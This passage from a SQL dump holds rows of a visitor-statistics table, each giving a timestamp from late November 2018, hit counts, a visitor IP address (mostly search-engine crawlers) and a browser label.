,2,0,0,'91.196.178.130','firefox'),(342322,1543405912,10,10,0,0,'207.46.13.216','other'),(342323,1543405939,3,3,0,0,'207.46.13.218','other'),(342324,1543406091,1,1,0,0,'66.249.75.17','chrome'),(342326,1543406103,1,1,0,0,'46.229.168.133','other'),(342327,1543406811,1,1,0,0,'8.29.198.25','other'),(342328,1543406822,1,1,0,0,'54.36.148.77','other'),(342329,1543406925,1,1,0,0,'178.154.244.29','other'),(342330,1543406954,1,1,0,0,'176.118.166.51','chrome'),(342331,1543407186,1,1,0,0,'54.36.149.54','other'),(342332,1543407303,1,1,0,0,'8.29.198.26','other'),(342333,1543407646,1,1,0,0,'54.36.148.64','other'),(342334,1543408481,2,2,0,0,'130.180.220.39','chrome'),(342335,1543409050,4,4,0,0,'91.196.178.174','chrome'),(342336,1543409361,1,1,0,0,'207.46.13.218','other'),(342337,1543409362,1,1,0,0,'54.36.149.34','other'),(342338,1543409997,1,1,0,0,'54.36.148.190','other'),(342339,1543410083,9,9,0,0,'178.154.244.29','other'),(342340,1543410348,1,1,0,0,'46.229.168.150','other'),(342341,1543410350,5,5,0,0,'207.46.13.217','other'),(342342,1543410355,1,1,0,0,'46.229.168.139','other'),(342343,1543410366,1,1,0,0,'66.249.75.17','chrome'),(342344,1543410376,1,1,0,0,'66.249.75.21','chrome'),(342345,1543410427,1,1,0,0,'46.229.168.151','other'),(342346,1543410596,4,4,0,0,'178.154.244.11','other'),(342347,1543410766,1,1,0,0,'87.250.224.65','other'),(342348,1543411030,6,6,0,0,'178.154.244.29','other'),(342349,1543411118,2,2,0,0,'5.45.207.79','other'),(342350,1543411167,1,1,0,0,'54.36.149.72','other'),(342351,1543411239,1,1,0,0,'95.108.213.4','other'),(342352,1543411745,1,1,0,0,'46.229.168.135','other'),(342353,1543411747,1,1,0,0,'46.229.168.145','other'),(342354,1543411776,1,1,0,0,'54.36.148.75','other'),(342355,1543411842,1,1,0,0,'178.154.244.11','other'),(342356,1543412072,1,1,0,0,'54.36.148.74','other'),(342357,1543412131,1,1,0,0,'54.36.149.71','other'),(342358,1543412291,1,1,0,0,'46.229.168.132','other'),(342359,1543412402,1,1,0,0,'66.249.75.144','chrome'),(342360,1543412431,1,1,0,0,'207.46.13.215','other'),(342361,1543412584,1,1,0,0,'40.77.167.217','other'),(342362,1543412588,1,1,0,0,'40.77.167.214','other'),(342363,1543412783,1,1,0,0,'54.36.149.102','other'),(342364,1543412867,1,1,0,0,'46.219.200.9','chrome'),(342365,1543412910,1,1,0,0,'40.77.167.218','other'),(342366,1543412911,1,1,0,0,'54.36.149.98','other'),(342367,1543413177,1,1,0,0,'54.36.149.105','other'),(342368,1543413726,1,1,0,0,'95.163.255.68','other'),(342369,1543413730,1,1,0,0,'95.163.255.62','other'),(342370,1543414601,1,1,0,0,'54.36.148.159','other'),(342371,1543414613,2,2,0,0,'207.46.13.215','other'),(342372,1543414721,1,1,0,0,'46.229.168.147','other'),(342373,1543414973,1,1,0,0,'66.249.75.22','chrome'),(342374,1543415147,2,2,0,0,'91.196.178.81','chrome'),(342375,1543415158,2,2,0,0,'37.145.118.208','chrome'),(342376,1543415161,2,2,0,0,'5.16.82.70','chrome'),(342377,1543415192,2,2,0,0,'91.196.178.131','firefox'),(342378,1543415274,1,1,0,0,'66.249.75.144','chrome'),(342379,1543415980,1,1,0,0,'8.29.198.25','other'),(342380,1543416026,1,1,0,0,'54.36.148.96','other'),(342381,1543416607,1,1,0,0,'54.36.148.234','other'),(342382,1543416695,1,1,0,0,'54.36.149.11','other'),(342383,1543416927,1,1,0,0,'54.36.148.24','other'),(342384,1543416940,1,1,0,0,'54.36.148.92','other'),(342385,1543417160,1,1,0,0,'46.229.168.144','other'),(342386,1543417162,1,1,0,0,'46.229.168.129','other'),(342387,1543417452,1,1,0,0,'178.95.246.220','chrome'),(342388,1543417674,1,1,0,0,'8.29.198.27','other'),(342389,1543418165,1,1,0,0,'8.29.198.26','other'),(342390,1543418774,1,1,0,0,'54.36.148.193','other'),(342391,1543418866,1,1,0,0,'66.249.64.201','chrome'),(342393,1543418933,1,1,0,0,'207.46.13.216','other'),(342394,1543419545,1,1,0,0,'66.249.64.61','chrome'),(342395,1543419547,1,1,0,0,'66.249.64.40','chrome'),(342396,1543419759,1,1,0,0,'54.36.148.92','other'),(342397,1543419770,1,1,0,0,'54.36.148.182','other'),(342398,1543419981,1,1,0,0,'54.36.149.42','other'),(342399,1543420084,1,1,0,0,'207.46.13.218','other'),(342400,1543420520,1,1,0,0,'178.154.244.11','other'),(342401,1543420692,1,1,0,0,'54.36.149.58','other'),(342402,1543421023,2,2,0,0,'207.46.13.217','other'),(342403,1543421070,1,1,0,0,'66.249.64.195','chrome'),(342404,1543421071,1,1,0,0,'66.249.64.222','chrome'),(342405,1543421422,1,1,0,0,'207.46.13.216','other'),(342406,1543421695,1,1,0,0,'46.229.168.143','other'),(342407,1543421710,2,2,0,0,'207.46.13.218','other'),(342408,1543421934,2,2,0,0,'178.154.244.29','other'),(342409,1543422049,1,1,0,0,'66.249.64.220','chrome'),(342410,1543422059,1,1,0,0,'46.229.168.147','other'),(342411,1543422177,1,1,0,0,'66.249.64.59','chrome'),(342412,1543422178,1,1,0,0,'66.249.64.42','chrome'),(342413,1543422349,1,1,0,0,'54.36.148.117','other'),(342414,1543422997,1,1,0,0,'54.36.148.108','other'),(342415,1543423328,1,1,0,0,'54.36.148.47','other'),(342416,1543423513,2,2,0,0,'212.66.51.107','chrome'),(342417,1543423544,1,1,0,0,'54.36.148.200','other'),(342418,1543423673,1,1,0,0,'54.36.149.29','other'),(342419,1543423679,2,2,0,0,'91.209.11.236','other'),(342420,1543424078,1,1,0,0,'54.36.149.67','other'),(342421,1543424289,3,3,0,0,'178.154.244.11','other'),(342422,1543424320,1,1,0,0,'46.229.168.132','other'),(342423,1543424323,1,1,0,0,'46.229.168.146','other'),(342424,1543424352,1,1,0,0,'46.229.168.130','other'),(342425,1543424354,6,6,0,0,'178.154.244.29','other'),(342426,1543424392,1,1,0,0,'54.36.148.106','other'),(342427,1543424589,1,1,0,0,'54.36.149.47','other'),(342428,1543424650,2,2,0,0,'141.8.142.103','other'),(342429,1543424772,3,3,0,0,'5.45.207.79','other'),(342430,1543424828,1,1,0,0,'207.46.13.217','other'),(342431,1543425132,2,2,0,0,'207.46.13.216','other'),(342432,1543425170,1,1,0,0,'207.46.13.218','other'),(342433,1543425221,1,1,0,0,'46.229.168.133','other'),(342434,1543425224,1,1,0,0,'46.229.168.141','other'),(342435,1543425266,4,4,0,0,'178.154.244.11','other'),(342436,1543425294,1,1,0,0,'5.45.207.19','other'),(342437,1543425308,7,7,0,0,'178.154.244.29','other'),(342438,1543425678,1,1,0,0,'91.242.162.21','other'),(342439,1543425682,1,1,0,0,'92.112.247.236','firefox'),(342440,1543425739,1,1,0,0,'54.36.149.11','other'),(342441,1543426225,1,1,0,0,'5.45.207.79','other'),(342442,1543426384,1,1,0,0,'207.46.13.218','other'),(342443,1543426644,1,1,0,0,'54.36.148.20','other'),(342444,1543426829,1,1,0,0,'8.29.198.25','other'),(342445,1543427033,1,1,0,0,'178.154.244.29','other'),(342446,1543427103,1,1,0,0,'54.36.148.72','other'),(342447,1543427408,1,1,0,0,'46.229.168.133','other'),(342448,1543427483,1,1,0,0,'207.46.13.216','other'),(342449,1543427956,1,1,0,0,'178.154.244.11','other'),(342450,1543428108,2,2,0,0,'91.196.178.93','firefox'),(342451,1543428421,1,1,0,0,'54.36.149.98','other'),(342452,1543428477,2,2,0,0,'207.46.13.215','other'),(342453,1543428516,1,1,0,0,'8.29.198.26','other'),(342454,1543428543,2,2,0,0,'95.163.255.66','other'),(342455,1543429010,1,1,0,0,'8.29.198.27','other'),(342456,1543429345,1,1,0,0,'46.229.168.140','other'),(342457,1543429893,1,1,0,0,'95.163.255.113','other'),(342458,1543429896,2,2,0,0,'95.163.255.116','other'),(342459,1543429905,1,1,0,0,'95.163.255.119','other'),(342460,1543429912,1,1,0,0,'95.163.255.112','other'),(342461,1543429926,1,1,0,0,'95.163.255.108','other'),(342462,1543429928,1,1,0,0,'54.36.148.57','other'),(342463,1543430312,1,1,0,0,'46.229.168.153','other'),(342464,1543430902,1,1,0,0,'207.46.13.216','other'),(342465,1543430939,1,1,0,0,'54.36.148.178','other'),(342466,1543431069,1,1,0,0,'54.36.148.238','other'),(342467,1543431177,1,1,0,0,'207.46.13.215','other'),(342468,1543431208,1,1,0,0,'54.36.148.151','other'),(342469,1543431385,2,2,0,0,'46.211.133.214','chrome'),(342470,1543431434,1,1,0,0,'54.36.148.161','other'),(342471,1543432335,1,1,0,0,'46.229.168.154','other'),(342472,1543432340,1,1,0,0,'46.229.168.140','other'),(342473,1543432622,1,1,0,0,'54.36.148.108','other'),(342474,1543433847,2,2,0,0,'91.196.178.135','firefox'),(342475,1543433946,8,8,0,0,'207.46.13.216','other'),(342476,1543434178,1,1,0,0,'207.46.13.217','other'),(342477,1543434223,1,1,0,0,'54.36.148.15','other'),(342478,1543434459,1,1,0,0,'54.36.148.171','other'),(342479,1543434602,1,1,0,0,'54.36.148.34','other'),(342480,1543434969,1,1,0,0,'54.36.149.104','other'),(342481,1543435074,1,1,0,0,'54.36.149.6','other'),(342482,1543435328,2,2,0,0,'93.76.96.233','firefox'),(342483,1543435452,1,1,0,0,'207.46.13.217','other'),(342484,1543435706,1,1,0,0,'46.229.168.141','other'),(342485,1543435713,1,1,0,0,'46.229.168.129','other'),(342486,1543436210,1,1,0,0,'207.46.13.218','other'),(342487,1543436380,1,1,0,0,'54.36.148.141','other'),(342488,1543436401,1,1,0,0,'46.229.168.143','other'),(342489,1543436405,1,1,0,0,'46.229.168.153','other'),(342490,1543436499,1,1,0,0,'54.36.148.156','other'),(342491,1543436509,1,1,0,0,'188.163.5.20','chrome'),(342492,1543436682,1,1,0,0,'93.78.184.137','firefox'),(342493,1543436724,2,2,0,0,'66.249.64.201','chrome'),(342494,1543436725,1,1,0,0,'66.249.64.218','chrome'),(342495,1543436805,1,1,0,0,'54.36.149.85','other'),(342496,1543436910,1,1,0,0,'180.76.15.154','other'),(342497,1543437055,1,1,0,0,'54.36.148.96','other'),(342498,1543437081,2,2,0,0,'66.249.64.222','chrome'),(342499,1543437354,1,1,0,0,'54.36.149.49','other'),(342500,1543437584,1,1,0,0,'66.249.64.61','chrome'),(342501,1543437585,1,1,0,0,'66.249.64.42','chrome'),(342502,1543437593,1,1,0,0,'66.249.64.199','chrome'),(342503,1543437667,1,1,0,0,'8.29.198.27','other'),(342504,1543437791,1,1,0,0,'54.36.149.39','other'),(342505,1543437924,1,1,0,0,'91.242.162.21','other'),(342506,1543438000,2,2,0,0,'46.211.67.198','chrome'),(342507,1543438593,1,1,0,0,'54.36.148.124','other'),(342508,1543438715,1,1,0,0,'54.36.148.220','other'),(342509,1543438910,1,1,0,0,'180.76.15.8','other'),(342510,1543438911,1,1,0,0,'180.76.15.140','other'),(342511,1543438928,1,1,0,0,'66.249.64.44','chrome'),(342512,1543439243,1,1,0,0,'54.36.148.45','other'),(342513,1543439345,2,2,0,0,'8.29.198.26','other'),(342514,1543439529,1,1,0,0,'207.46.13.217','other'),(342515,1543439584,4,4,0,0,'91.209.11.236','other'),(342516,1543439626,2,2,0,0,'31.43.237.250','chrome'),(342517,1543440141,1,1,0,0,'54.36.149.13','other'),(342518,1543440747,2,2,0,0,'46.229.168.153','other'),(342519,1543440797,1,1,0,0,'54.36.148.162','other'),(342520,1543440885,1,1,0,0,'54.36.148.62','other'),(342521,1543440972,1,1,0,0,'173.252.87.3','other'),(342522,1543440975,1,1,0,0,'173.252.87.11','other'),(342523,1543441042,1,1,0,0,'178.154.244.29','other'),(342524,1543441178,1,1,0,0,'54.36.148.127','other'),(342525,1543441180,1,1,0,0,'54.36.148.222','other'),(342526,1543441240,1,1,0,0,'207.46.13.217','other'),(342527,1543441397,1,1,0,0,'54.36.149.54','other'),(342528,1543441535,1,1,0,0,'54.36.148.227','other'),(342529,1543441752,1,1,0,0,'207.46.13.215','other'),(342530,1543441822,1,1,0,0,'54.36.148.225','other'),(342531,1543442161,1,1,0,0,'46.229.168.136','other'),(342532,1543442164,1,1,0,0,'46.229.168.129','other'),(342533,1543443459,2,2,0,0,'178.154.244.29','other'),(342534,1543443516,1,1,0,0,'173.252.87.3','other'),(342535,1543443517,1,1,0,0,'173.252.87.5','other'),(342536,1543443766,1,1,0,0,'46.229.168.137','other'),(342537,1543443769,1,1,0,0,'46.229.168.130','other'),(342538,1543443940,1,1,0,0,'46.229.168.135','other'),(342539,1543444126,1,1,0,0,'54.36.148.200','other'),(342540,1543444213,1,1,0,0,'207.46.13.216','other'),(342541,1543444260,1,1,0,0,'54.36.148.89','other'),(342542,1543444710,1,1,0,0,'66.249.64.201','chrome'),(342543,1543444711,1,1,0,0,'66.249.64.218','chrome'),(342544,1543444961,1,1,0,0,'178.154.244.29','other'),(342545,1543444962,1,1,0,0,'178.154.244.11','other'),(342546,1543445792,1,1,0,0,'207.46.13.216','other'),(342547,1543446173,1,1,0,0,'54.36.148.106','other'),(342548,1543446355,1,1,0,0,'46.229.168.142','other'),(342549,1543446376,1,1,0,0,'207.46.13.218','other'),(342550,1543446767,1,1,0,0,'66.249.64.59','chrome'),(342551,1543446768,1,1,0,0,'66.249.64.42','chrome'),(342552,1543446787,1,1,0,0,'40.77.167.217','other'),(342553,1543446923,1,1,0,0,'54.36.149.106','other'),(342554,1543447565,1,1,0,0,'54.36.148.237','other'),(342555,1543448028,1,1,0,0,'46.229.168.148','other'),(342556,1543448030,1,1,0,0,'46.229.168.135','other'),(342557,1543448356,1,1,0,0,'66.249.64.195','chrome'),(342558,1543448368,1,1,0,0,'66.249.64.218','chrome'),(342559,1543448462,1,1,0,0,'54.36.148.226','other'),(342560,1543448503,1,1,0,0,'8.29.198.25','other'),(342561,1543449051,1,1,0,0,'207.46.13.215','other'),(342562,1543449710,1,1,0,0,'54.36.148.122','other'),(342563,1543449749,1,1,0,0,'46.229.168.142','other'),(342564,1543449953,1,1,0,0,'46.229.168.129','other'),(342565,1543450193,2,2,0,0,'8.29.198.26','other'),(342566,1543450237,1,1,0,0,'66.249.64.61','chrome'),(342568,1543450426,1,1,0,0,'54.36.148.164','other'),(342569,1543450898,1,1,0,0,'54.36.148.219','other'),(342570,1543451302,1,1,0,0,'46.229.168.129','other'),(342571,1543451335,1,1,0,0,'66.249.64.218','chrome'),(342572,1543451469,1,1,0,0,'54.36.148.169','other'),(342573,1543451502,1,1,0,0,'46.229.168.142','other'),(342574,1543451504,1,1,0,0,'46.229.168.140','other'),(342575,1543452223,1,1,0,0,'54.36.148.161','other'),(342576,1543452308,1,1,0,0,'54.36.148.148','other'),(342577,1543452657,1,1,0,0,'54.36.148.141','other'),(342578,1543452726,1,1,0,0,'54.36.148.22','other'),(342579,1543453493,1,1,0,0,'54.165.59.7','other'),(342580,1543453625,2,2,0,0,'207.46.13.217','other'),(342581,1543453677,1,1,0,0,'66.249.64.195','chrome'),(342583,1543453897,1,1,0,0,'54.36.148.40','other'),(342584,1543453953,1,1,0,0,'54.36.149.5','other'),(342585,1543454354,1,1,0,0,'66.249.64.222','chrome'),(342586,1543454628,1,1,0,0,'95.163.255.171','other'),(342587,1543454630,1,1,0,0,'95.163.255.150','other'),(342588,1543454632,1,1,0,0,'46.229.168.139','other'),(342589,1543455178,1,1,0,0,'54.36.148.89','other'),(342590,1543455665,1,1,0,0,'87.250.224.47','other'),(342592,1543455719,1,1,0,0,'207.46.13.218','other'),(342593,1543455878,1,1,0,0,'141.8.142.191','other'),(342594,1543455953,1,1,0,0,'37.9.113.20','other'),(342595,1543455967,1,1,0,0,'141.8.183.22','other'),(342596,1543455982,2,2,0,0,'141.8.142.103','other'),(342597,1543456008,1,1,0,0,'5.255.253.16','other'),(342598,1543456051,1,1,0,0,'178.154.244.49','other'),(342599,1543456097,2,2,0,0,'87.250.224.118','other'),(342600,1543456117,1,1,0,0,'178.154.171.30','other'),(342601,1543456181,2,2,0,0,'87.250.224.65','other'),(342602,1543456218,1,1,0,0,'95.163.255.115','other'),(342603,1543456224,1,1,0,0,'95.163.255.102','other'),(342604,1543456237,1,1,0,0,'54.36.148.214','other'),(342605,1543456260,1,1,0,0,'95.163.255.118','other'),(342606,1543456268,1,1,0,0,'95.163.255.104','other'),(342607,1543456277,1,1,0,0,'95.163.255.112','other'),(342608,1543456566,1,1,0,0,'95.108.213.4','other'),(342609,1543456650,2,2,0,0,'37.9.113.148','other'),(342610,1543456725,1,1,0,0,'178.154.244.11','other'),(342611,1543456857,1,1,0,0,'141.8.183.23','other'),(342612,1543456891,1,1,0,0,'141.8.142.108','other'),(342613,1543456892,1,1,0,0,'95.108.181.54','other'),(342614,1543456893,1,1,0,0,'5.45.207.8','other'),(342615,1543457008,1,1,0,0,'95.163.255.119','other'),(342616,1543457145,1,1,0,0,'213.180.203.17','other'),(342617,1543457237,2,2,0,0,'213.180.203.53','other'),(342618,1543457341,1,1,0,0,'54.36.148.227','other'),(342619,1543457367,1,1,0,0,'5.255.253.16','other'),(342620,1543457606,1,1,0,0,'46.229.168.136','other'),(342621,1543457624,1,1,0,0,'207.46.13.216','other'),(342622,1543457771,1,1,0,0,'54.36.149.41','other'),(342623,1543457792,1,1,0,0,'46.229.168.143','other'),(342624,1543457794,1,1,0,0,'46.229.168.146','other'),(342625,1543457846,2,2,0,0,'195.123.209.104','chrome'),(342626,1543457967,1,1,0,0,'54.36.148.194','other'),(342627,1543458268,1,1,0,0,'54.36.148.165','other'),(342628,1543458561,1,1,0,0,'54.36.148.78','other'),(342629,1543458750,1,1,0,0,'207.46.13.218','other'),(342630,1543459184,1,1,0,0,'66.249.64.61','chrome'),(342631,1543459185,1,1,0,0,'66.249.64.40','chrome'),(342632,1543459333,1,1,0,0,'8.29.198.27','other'),(342633,1543459549,1,1,0,0,'46.229.168.133','other'),(342634,1543459808,1,1,0,0,'54.36.148.165','other'),(342635,1543459813,1,1,0,0,'95.163.255.97','other'),(342636,1543459816,1,1,0,0,'95.163.255.94','other'),(342637,1543459820,1,1,0,0,'207.46.13.216','other'),(342638,1543459936,1,1,0,0,'54.36.148.22','other'),(342639,1543460154,1,1,0,0,'66.249.64.42','chrome'),(342640,1543460750,2,2,0,0,'18.236.121.241','chrome'),(342641,1543460895,1,1,0,0,'54.36.148.143','other'),(342642,1543461035,2,2,0,0,'8.29.198.25','other'),(342643,1543461159,1,1,0,0,'54.36.148.38','other'),(342644,1543461328,1,1,0,0,'54.36.149.67','other'),(342645,1543462133,1,1,0,0,'54.36.148.233','other'),(342646,1543462193,1,1,0,0,'54.36.148.24','other'),(342647,1543462489,1,1,0,0,'207.46.13.216','other'),(342648,1543462718,1,1,0,0,'207.46.13.215','other'),(342649,1543463081,1,1,0,0,'54.36.149.43','other'),(342650,1543463182,1,1,0,0,'46.229.168.135','other'),(342651,1543463201,1,1,0,0,'54.36.148.143','other'),(342652,1543463327,1,1,0,0,'46.229.168.134','other'),(342653,1543463432,1,1,0,0,'54.36.148.121','other'),(342654,1543463531,1,1,0,0,'54.36.148.26','other'),(342655,1543464053,1,1,0,0,'46.229.168.138','other'),(342656,1543464059,1,1,0,0,'46.229.168.141','other'),(342657,1543464175,1,1,0,0,'118.24.63.246','other'),(342658,1543464233,1,1,0,0,'178.154.244.11','other'),(342659,1543464234,1,1,0,0,'5.45.207.79','other'),(342660,1543464436,1,1,0,0,'54.36.148.34','other'),(342661,1543464844,1,1,0,0,'54.36.148.225','other'),(342662,1543465283,1,1,0,0,'54.36.148.191','other'),(342663,1543465513,1,1,0,0,'54.36.149.99','other'),(342664,1543465853,1,1,0,0,'207.46.13.215','other'),(342665,1543465994,1,1,0,0,'207.46.13.218','other'),(342666,1543466402,1,1,0,0,'54.36.148.118','other'),(342667,1543466421,1,1,0,0,'66.249.64.195','chrome'),(342669,1543466672,1,1,0,0,'141.8.183.22','other'),(342670,1543466681,1,1,0,0,'141.8.183.11','other'),(342671,1543466824,1,1,0,0,'54.36.149.86','other'),(342672,1543466961,1,1,0,0,'66.249.64.42','chrome'),(342673,1543467202,1,1,0,0,'178.154.244.29','other'),(342674,1543467292,2,2,0,0,'207.46.13.218','other'),(342675,1543467295,1,1,0,0,'46.229.168.133','other'),(342676,1543467409,1,1,0,0,'54.36.148.249','other'),(342677,1543467485,1,1,0,0,'54.36.148.156','other'),(342678,1543467685,1,1,0,0,'46.211.52.53','chrome'),(342679,1543467897,1,1,0,0,'46.229.168.141','other'),(342680,1543468205,1,1,0,0,'66.249.64.220','chrome'),(342681,1543468275,1,1,0,0,'54.36.148.98','other'),(342682,1543468338,1,1,0,0,'46.229.168.142','other'),(342683,1543469138,1,1,0,0,'66.249.64.218','chrome'),(342684,1543469640,1,1,0,0,'54.36.148.49','other'),(342685,1543469804,1,1,0,0,'54.36.148.145','other'),(342686,1543469851,1,1,0,0,'207.46.13.218','other'),(342687,1543469900,1,1,0,0,'207.46.13.217','other'),(342688,1543469970,1,1,0,0,'66.249.64.195','chrome'),(342689,1543469971,1,1,0,0,'66.249.64.220','chrome'),(342690,1543470008,1,1,0,0,'54.36.148.102','other'),(342691,1543470160,1,1,0,0,'8.29.198.25','other'),(342692,1543470209,1,1,0,0,'54.36.149.43','other'),(342693,1543470416,1,1,0,0,'95.163.255.182','other'),(342694,1543470419,1,1,0,0,'95.163.255.172','other'),(342695,1543470528,1,1,0,0,'54.36.149.75','other'),(342696,1543470677,1,1,0,0,'95.163.255.92','other'),(342697,1543470680,1,1,0,0,'95.163.255.93','other'),(342698,1543471382,1,1,0,0,'46.229.168.140','other'),(342699,1543471884,1,1,0,0,'8.29.198.27','other'),(342700,1543471970,2,2,0,0,'46.229.168.132','other'),(342701,1543472118,1,1,0,0,'46.229.168.141','other'),(342702,1543472322,1,1,0,0,'46.229.168.129','other'),(342703,1543472338,4,4,0,0,'46.174.121.173','chrome'),(342704,1543472395,1,1,0,0,'8.29.198.25','other'),(342705,1543472807,1,1,0,0,'92.112.29.46','chrome'),(342706,1543472998,1,1,0,0,'46.229.168.153','other'),(342707,1543473004,1,1,0,0,'46.229.168.137','other'),(342708,1543473029,1,1,0,0,'46.229.168.152','other'),(342709,1543473687,1,1,0,0,'54.36.149.46','other'),(342710,1543474006,1,1,0,0,'54.36.148.221','other'),(342711,1543474054,1,1,0,0,'207.46.13.215','other'),(342712,1543474231,1,1,0,0,'54.36.149.87','other'),(342713,1543474708,1,1,0,0,'54.36.148.225','other'),(342714,1543475098,1,1,0,0,'54.36.149.47','other'),(342715,1543475500,1,1,0,0,'66.249.64.195','chrome'),(342716,1543475501,1,1,0,0,'66.249.64.220','chrome'),(342717,1543476099,1,1,0,0,'46.229.168.149','other'),(342718,1543476233,1,1,0,0,'54.36.148.115','other'),(342719,1543476542,1,1,0,0,'95.163.255.93','other'),(342720,1543476544,1,1,0,0,'95.163.255.94','other'),(342721,1543476758,3,3,0,0,'207.46.13.216','other'),(342722,1543476818,1,1,0,0,'46.229.168.147','other'),(342723,1543476820,1,1,0,0,'195.140.224.21','chrome'),(342724,1543476823,1,1,0,0,'46.229.168.146','other'),(342725,1543476983,4,4,0,0,'207.46.13.217','other'),(342726,1543477190,10,10,0,0,'178.154.244.29','other'),(342727,1543477262,1,1,0,0,'5.45.207.79','other'),(342728,1543477278,4,4,0,0,'178.154.244.11','other'),(342729,1543477608,3,3,0,0,'207.46.13.218','other'),(342730,1543477675,1,1,0,0,'88.135.217.34','chrome'),(342731,1543477747,1,1,0,0,'54.36.148.79','other'),(342732,1543477802,3,3,0,0,'207.46.13.215','other'),(342733,1543477835,2,2,0,0,'5.45.207.8','other'),(342734,1543477889,2,2,0,0,'184.175.34.90','other'),(342735,1543478068,1,1,0,0,'46.133.26.58','chrome'),(342736,1543478112,5,5,0,0,'178.154.244.29','other'),(342737,1543478284,1,1,0,0,'87.250.224.47','other'),(342738,1543478299,4,4,0,0,'178.154.244.11','other'),(342739,1543478331,1,1,0,0,'5.45.207.79','other'),(342740,1543478436,1,1,0,0,'66.249.64.218','chrome'),(342741,1543478569,3,3,0,0,'91.196.177.15','chrome'),(342742,1543478584,1,1,0,0,'207.46.13.217','other'),(342743,1543478762,3,3,0,0,'91.196.178.92','chrome'),(342744,1543479037,1,1,0,0,'207.46.13.216','other'),(342745,1543479066,1,1,0,0,'191.96.181.103','chrome'),(342746,1543479071,1,1,0,0,'178.171.54.21','chrome'),(342747,1543479333,1,1,0,0,'40.77.167.217','other'),(342748,1543479518,2,2,0,0,'130.180.216.11','chrome'),(342749,1543479532,1,1,0,0,'173.252.87.12','other'),(342750,1543479539,1,1,0,0,'207.46.13.217','other'),(342751,1543479711,1,1,0,0,'207.46.13.215','other'),(342752,1543479887,1,1,0,0,'46.229.168.147','other'),(342753,1543480002,1,1,0,0,'91.196.178.92','chrome'),(342754,1543480009,1,1,0,0,'5.53.119.182','chrome'),(342755,1543480141,1,1,0,0,'46.229.168.129','other'),(342756,1543480143,1,1,0,0,'46.229.168.148','other'),(342757,1543480375,1,1,0,0,'207.46.13.218','other'),(342758,1543480400,1,1,0,0,'207.46.13.216','other'),(342759,1543480769,1,1,0,0,'66.249.64.57','chrome'),(342760,1543480770,1,1,0,0,'66.249.64.40','chrome'),(342761,1543480988,1,1,0,0,'8.29.198.27','other'),(342762,1543481249,1,1,0,0,'178.92.170.55','chrome'),(342763,1543481641,1,1,0,0,'46.200.40.56','chrome'),(342764,1543481999,1,1,0,0,'207.46.13.216','other'),(342765,1543482476,1,1,0,0,'207.46.13.217','other'),(342766,1543482723,1,1,0,0,'8.29.198.25','other'),(342767,1543482744,1,1,0,0,'207.46.13.215','other'),(342768,1543483021,2,2,0,0,'95.163.255.93','other'),(342769,1543483240,1,1,0,0,'8.29.198.27','other'),(342770,1543483713,2,2,0,0,'207.46.13.215','other'),(342771,1543484001,1,1,0,0,'207.46.13.218','other'),(342772,1543484228,1,1,0,0,'173.252.87.10','other'),(342773,1543484230,1,1,0,0,'173.252.87.11','other'),(342774,1543484694,1,1,0,0,'207.46.13.215','other'),(342775,1543484948,1,1,0,0,'178.92.170.55','chrome'),(342776,1543486008,1,1,0,0,'173.252.87.17','other'),(342777,1543486010,1,1,0,0,'173.252.87.7','other'),(342778,1543486091,1,1,0,0,'220.243.136.203','chrome'),(342779,1543486092,1,1,0,0,'220.243.136.251','chrome'),(342780,1543486097,2,2,0,0,'220.243.136.206','chrome'),(342781,1543486123,1,1,0,0,'220.243.135.118','chrome'),(342782,1543486126,1,1,0,0,'220.243.135.99','chrome'),(342783,1543486646,1,1,0,0,'207.46.13.218','other'),(342784,1543486668,1,1,0,0,'46.174.121.173','chrome'),(342785,1543486804,1,1,0,0,'82.207.49.146','chrome'),(342786,1543487342,1,1,0,0,'46.229.168.142','other'),(342787,1543487730,1,1,0,0,'173.252.87.17','other'),(342788,1543487731,1,1,0,0,'173.252.87.6','other'),(342789,1543487879,1,1,0,0,'91.196.179.138','chrome'),(342790,1543487961,1,1,0,0,'91.237.107.22','chrome'),(342791,1543488097,1,1,0,0,'66.102.9.40','chrome'),(342792,1543488098,1,1,0,0,'37.55.57.223','chrome'),(342793,1543488123,1,1,0,0,'66.102.9.35','chrome'),(342794,1543488168,6,6,0,0,'178.154.244.11','other'),(342795,1543488172,7,7,0,0,'178.154.244.29','other'),(342796,1543488176,1,1,0,0,'37.9.113.148','other'),(342797,1543488666,4,4,0,0,'5.45.207.19','other'),(342798,1543488943,1,1,0,0,'5.45.207.79','other'),(342799,1543489177,5,5,0,0,'178.154.244.29','other'),(342800,1543489576,1,1,0,0,'207.46.13.216','other'),(342801,1543490202,1,1,0,0,'95.163.255.193','other'),(342802,1543490272,1,1,0,0,'95.163.255.162','other'),(342803,1543491048,1,1,0,0,'46.229.168.153','other'),(342804,1543491147,1,1,0,0,'46.229.168.146','other'),(342805,1543491659,1,1,0,0,'95.163.255.68','other'),(342806,1543491662,1,1,0,0,'95.163.255.62','other'),(342807,1543491670,1,1,0,0,'66.102.9.62','chrome'),(342808,1543491824,1,1,0,0,'8.29.198.27','other'),(342809,1543491994,2,2,0,0,'207.46.13.217','other'),(342810,1543492033,1,1,0,0,'46.229.168.136','other'),(342811,1543492096,1,1,0,0,'94.178.149.222','chrome'),(342812,1543492659,1,1,0,0,'54.36.148.136','other'),(342813,1543492747,1,1,0,0,'54.36.149.64','other'),(342814,1543492967,1,1,0,0,'54.36.148.203','other'),(342815,1543493009,1,1,0,0,'54.36.149.46','other'),(342816,1543493030,1,1,0,0,'95.163.255.94','other'),(342817,1543493033,1,1,0,0,'95.163.255.92','other'),(342818,1543493120,1,1,0,0,'54.36.148.131','other'),(342819,1543493209,2,2,0,0,'207.46.13.218','other'),(342820,1543493577,1,1,0,0,'8.29.198.25','other'),(342821,1543493818,1,1,0,0,'95.163.255.67','other'),(342822,1543493821,1,1,0,0,'95.163.255.68','other'),(342823,1543494020,1,1,0,0,'5.53.119.182','chrome'),(342824,1543494082,1,1,0,0,'8.29.198.26','other'),(342825,1543494186,1,1,0,0,'54.36.149.40','other'),(342826,1543494651,1,1,0,0,'54.36.148.225','other'),(342827,1543494688,1,1,0,0,'176.110.33.192','chrome'),(342828,1543494839,1,1,0,0,'54.36.149.102','other'),(342829,1543494878,1,1,0,0,'54.36.148.237','other'),(342830,1543495235,1,1,0,0,'188.165.255.126','other'),(342831,1543495392,1,1,0,0,'54.36.148.201','other'),(342832,1543495407,1,1,0,0,'54.36.148.40','other'),(342833,1543495706,1,1,0,0,'46.201.125.163','chrome'),(342834,1543495903,1,1,0,0,'54.36.148.157','other'),(342835,1543495909,1,1,0,0,'46.118.136.251','opera'),(342836,1543496235,1,1,0,0,'54.36.148.160','other'),(342837,1543496340,1,1,0,0,'54